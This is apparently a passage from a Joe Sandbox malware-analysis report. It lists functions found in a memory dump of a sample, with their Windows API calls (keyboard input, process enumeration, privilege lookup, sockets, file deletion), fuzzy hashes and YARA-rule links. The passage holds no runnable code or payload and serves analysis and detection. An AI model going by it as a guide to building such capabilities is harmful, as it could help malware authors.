Strings

0, xrefs: 00A8588F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: a05248593185aa31fac637a2d2af44cf49a2009f56b07ebecaff1dca842ac247
Instruction ID: a0807b43c4bba551e97fabe000c4c0f3d6ff6b33477cf97342a1b09cc2ca6a8f
Opcode Fuzzy Hash: a05248593185aa31fac637a2d2af44cf49a2009f56b07ebecaff1dca842ac247
Instruction Fuzzy Hash: C8012D31900218EFDF21AF61EC44BAEBBB5FB45361F1080A9E849D61A1DB308A95DF71

Uniqueness

Uniqueness Score: -1.00%

Function 00A5007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c84c85602c54f8f6eaa68c20e559a6f57d52f9106fb0e612801152eb25e33ca4
Instruction ID: 1506a161464cd4b7608968979195749c34f19acb951122135504fb4e89b94c14
Opcode Fuzzy Hash: c84c85602c54f8f6eaa68c20e559a6f57d52f9106fb0e612801152eb25e33ca4
Instruction Fuzzy Hash: 5FC14975A00206AFCB14CFA8C898EAEB7B5FF48315F218598E905EF251D731ED45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A7342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A73459
CoUninitialize.OLE32 ref: 00A73463
VariantInit.OLEAUT32(?), ref: 00A7346E
VariantClear.OLEAUT32(?), ref: 00A7371B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 25c8582986914e8660ce84ead8512f76da961e4b8bc94c0f7e6224ec1789e859
Instruction ID: a6d09bac385f5f92107355351aa768daf0749cf07e166f5a763613e616b17f17
Opcode Fuzzy Hash: 25c8582986914e8660ce84ead8512f76da961e4b8bc94c0f7e6224ec1789e859
Instruction Fuzzy Hash: 35A16B762043049FCB00DF68C985A2AB7E5FF88714F05C859F98A9B362DB70EE05DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A50436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000), ref: 00A505F0
CoTaskMemFree.OLE32(00000000), ref: 00A50608
CLSIDFromProgID.OLE32(?,?), ref: 00A5062D
_memcmp.LIBVCRUNTIME ref: 00A5064E

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 6389b93969f815f9118893eed847f2dc8e659679e3b606acf6dc2d9bfdcde6fe
Instruction ID: 816fb56d95050a6f618a870bd28cea726be86e14a1e23abb26dc33cba634f570
Opcode Fuzzy Hash: 6389b93969f815f9118893eed847f2dc8e659679e3b606acf6dc2d9bfdcde6fe
Instruction Fuzzy Hash: B081DC75A00109EFCB04DF94C984EEEB7B9FF89315F204558E916AB250DB71AE4ACF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A31391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A314C0

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 14914ac1525d22c8ba11a880f04ea139888f4a5c82cf4feb4123cc37758e8af2
Instruction ID: 76738888775fa63fce4afb0c3af45c64a16c83b0714432654de06e0662e493fd
Opcode Fuzzy Hash: 14914ac1525d22c8ba11a880f04ea139888f4a5c82cf4feb4123cc37758e8af2
Instruction Fuzzy Hash: C3414BB5A00610AFDB21BBFD9D46AFE3AB5EF41370F144235F41AD7192EA3488815762

Uniqueness

Uniqueness Score: -1.00%

Function 00A86278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00B95280,?), ref: 00A862E2
ScreenToClient.USER32(?,?), ref: 00A86315
MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00A86382

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 93bb7a4e145ae36fa0616d0482bf22059bd09157510c5015cd4b9f8bbe977d59
Instruction ID: 7ad74cb6cd5df90db9cccff5cd639302a5fab733c5fb756de86f22cc4b24b069
Opcode Fuzzy Hash: 93bb7a4e145ae36fa0616d0482bf22059bd09157510c5015cd4b9f8bbe977d59
Instruction Fuzzy Hash: 69512B74A00209EFEF10EF68D980AAE7BB5FF45360F108169F9159B2A1D730ED81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A71AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00A71AFD
WSAGetLastError.WSOCK32 ref: 00A71B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A71B8A
WSAGetLastError.WSOCK32 ref: 00A71B94

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: e852264204a7f179d0fc6044fd2ec566a15f6008b7a07cf4c50c416ae376fb76
Instruction ID: 4fba84986f08c39bbebc11c175482ccfda5dc05a9f020bf11f3d5ff90731e9ee
Opcode Fuzzy Hash: e852264204a7f179d0fc6044fd2ec566a15f6008b7a07cf4c50c416ae376fb76
Instruction Fuzzy Hash: 81419F75640204AFE720AF24D886F3A77E5AB84718F54C458FA1A9F3D3D772ED428B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A2B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9058434b49310aeecf4b9c71cf32e7f06900c58010449631d2cf09ea4d335572
Instruction ID: 9b1ab5ee675b1f7485db1ce1db9cb4837d5b818fe9cef5a2c25eeb8f1fdb0026
Opcode Fuzzy Hash: 9058434b49310aeecf4b9c71cf32e7f06900c58010449631d2cf09ea4d335572
Instruction Fuzzy Hash: 05411B71A10714BFD724AF3CDD41BAABBF9EB84710F20853AF552DB282D77199418790

Uniqueness

Uniqueness Score: -1.00%

Function 00A656D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A65783
GetLastError.KERNEL32(?,00000000), ref: 00A657A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A657CE
CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A657FA

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 6043becea555cec789146bcb32f4ffef698f65c020c1f1da9b43897ecb20fa9e
Instruction ID: 140c04d4b962faa2bb63cb3e0c40aa131af8ba7aa1c815bc25f04c003eb17557
Opcode Fuzzy Hash: 6043becea555cec789146bcb32f4ffef698f65c020c1f1da9b43897ecb20fa9e
Instruction Fuzzy Hash: 25412C35600615DFCB11EF55C544A6DBBF2EF89320B188888F94A9B362CB74FD05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A2D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00A16D71,00000000,00000000,00A182D9,?,00A182D9,?,00000001,00A16D71,8BE85006,00000001,00A182D9,00A182D9), ref: 00A2D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A2D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A2D9AB
__freea.LIBCMT ref: 00A2D9B4

Part of subcall function 00A23820: RtlAllocateHeap.NTDLL(00000000,?,00AC1444,?,00A0FDF5,?,?,009FA976,00000010,00AC1440,009F13FC,?,009F13C6,?,009F1129), ref: 00A23852

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 3bf10d29d728ed21a86d6bda861c472eb4ee9931cf8e36ece575bfc2573daee9
Instruction ID: 5bd8fc62ab10db51f5769c26db89b901dae04aec221b475cd01f40eb1b2c4e3e
Opcode Fuzzy Hash: 3bf10d29d728ed21a86d6bda861c472eb4ee9931cf8e36ece575bfc2573daee9
Instruction Fuzzy Hash: FE31B272A0022AABDF24DF68EC85EAE7BA5EB41310F154178FC04D7251E735CD91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00A5ABF1
SetKeyboardState.USER32(00000080), ref: 00A5AC0D
PostMessageW.USER32 ref: 00A5AC74
SendInput.USER32(00000001,?,0000001C), ref: 00A5ACC6

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 99615611534c8d78342fda9012e9207c3153c9f0db82b58368eb4fac37c97e09
Instruction ID: dacec92015e37c179b296600f592b103c7b09004bed2819180b0197890d91310
Opcode Fuzzy Hash: 99615611534c8d78342fda9012e9207c3153c9f0db82b58368eb4fac37c97e09
Instruction Fuzzy Hash: 9A313930B00318AFEF34CBA48C057FE7BB5BB65322F04431AEC85561D1D37489898762

Uniqueness

Uniqueness Score: -1.00%

Function 00A87674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00A8769A
GetWindowRect.USER32(?,?), ref: 00A87710
PtInRect.USER32(?,?,00A88B89), ref: 00A87720
MessageBeep.USER32 ref: 00A8778C

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 887c98396f66af651096bfa54377725c033bb9b0b5d19c2f783d840bbf8dcc60
Instruction ID: 23c3c873cdc1de87df0ac728ee0c09a8120b2dc802a54a2e85adb257f22ea7c2
Opcode Fuzzy Hash: 887c98396f66af651096bfa54377725c033bb9b0b5d19c2f783d840bbf8dcc60
Instruction Fuzzy Hash: 06418E34A05214DFCB11EFA8C894EADBBF5FF4A314F2941A9E8159B261D731E942CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A816DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A816EB

Part of subcall function 00A53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A53A57
Part of subcall function 00A53A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00A525B3), ref: 00A53A5E
Part of subcall function 00A53A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00A53A65

GetCaretPos.USER32(?), ref: 00A816FF
ClientToScreen.USER32(00000000,?), ref: 00A8174C
GetForegroundWindow.USER32 ref: 00A81752

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 6f5d653d3bcab71625971b1f5de2cf48ff1842024e103d75f930dbd892aa2df6
Instruction ID: d44c14da9561e5973a61129c0a93b6c591a6b9789223b979d7acce3f6663e80b
Opcode Fuzzy Hash: 6f5d653d3bcab71625971b1f5de2cf48ff1842024e103d75f930dbd892aa2df6
Instruction Fuzzy Hash: 2F313075D00249AFCB00EFA9C981DAEBBFDEF88314B5480A9E515E7211DA319E45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A5D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A5D501
Process32FirstW.KERNEL32(00000000,?), ref: 00A5D50F
Process32NextW.KERNEL32(00000000,?), ref: 00A5D52F
CloseHandle.KERNEL32(00000000), ref: 00A5D5DC

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: dfb9589de869ffccc94116879e097414602c2c2b41b58f6d506a714857078d2a
Instruction ID: d282a12f1d7765496d665227d151dfe14f9e91d6b756bd8b66b1e67fdfbfa17a
Opcode Fuzzy Hash: dfb9589de869ffccc94116879e097414602c2c2b41b58f6d506a714857078d2a
Instruction Fuzzy Hash: A0318F711083049FD310EF54C885BBFBBE8EFD9394F14092DF685861A1EB719A49CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A88FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2

GetCursorPos.USER32(?), ref: 00A89001
TrackPopupMenuEx.USER32 ref: 00A89016
GetCursorPos.USER32(?), ref: 00A8905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A47711,?,?,?), ref: 00A89094

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 9de88bd49b1e5a5e11649915931007b9eae27553a21996dfae95d70bc02c4c96
Instruction ID: 6c5261b2ba7512dd4cb3bdb4855507404890f8e2f0f28b6f8441ae985553341f
Opcode Fuzzy Hash: 9de88bd49b1e5a5e11649915931007b9eae27553a21996dfae95d70bc02c4c96
Instruction Fuzzy Hash: A1219F35600018EFCB25DF94CC58EFB7BB9EB4A360F184065F906572A2C3359961DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A5D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00A8CB68), ref: 00A5D2FB
GetLastError.KERNEL32 ref: 00A5D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 00A5D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A8CB68), ref: 00A5D376

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: fd9c0aca0e639be5cdf7604da6f6bd85eb050e524db2d54437f45b8b1e073a7c
Instruction ID: 6945afc2a6fca505b4a7c3488e62f2a22bd146a7cba09964dcba0395373604be
Opcode Fuzzy Hash: fd9c0aca0e639be5cdf7604da6f6bd85eb050e524db2d54437f45b8b1e073a7c
Instruction Fuzzy Hash: E72191705052019FC720EF64C8819AAB7E4FF95375F104A1DF899DB2A1E730D94ACB93

Uniqueness

Uniqueness Score: -1.00%

Function 00A51571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A51014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A5102A
Part of subcall function 00A51014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A51036
Part of subcall function 00A51014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A51045
Part of subcall function 00A51014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A5104C
Part of subcall function 00A51014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A51062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A515BE
_memcmp.LIBVCRUNTIME ref: 00A515E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A51617
HeapFree.KERNEL32(00000000), ref: 00A5161E

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: e44690c546bb9252c69016aa635624c495e8f30014506cf91f9f52df777c347a
Instruction ID: 01a0ec7d92379ce04ec5a4755e3666d7e5a14f1546065b6ce0a527eb0cf2dc28
Opcode Fuzzy Hash: e44690c546bb9252c69016aa635624c495e8f30014506cf91f9f52df777c347a
Instruction Fuzzy Hash: 8A214871E40109AFDB10DFA4C989BFEB7B8FF44356F184459E851AB241E734AA49CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A82782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00A8280A
SetWindowLongW.USER32 ref: 00A82824
SetWindowLongW.USER32 ref: 00A82832
SetLayeredWindowAttributes.USER32 ref: 00A82840

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: c5b599ebde21c2d1572fd433537d2fbcef4f374b0d874dc7aa19531ac3c15617
Instruction ID: 6761f9d947a6d3f2ec06b789e077ecc31959f06ee94cf76073acb97b32a9a902
